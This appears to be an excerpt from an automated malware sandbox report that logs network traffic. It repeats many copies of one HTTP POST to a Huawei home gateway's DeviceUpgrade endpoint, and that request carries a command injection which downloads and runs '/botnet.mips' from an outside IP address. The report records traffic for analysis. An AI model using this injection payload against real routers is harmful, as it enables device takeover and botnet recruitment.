      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45386
      Source: unknownNetwork traffic detected: HTTP traffic on port 58054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
      Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
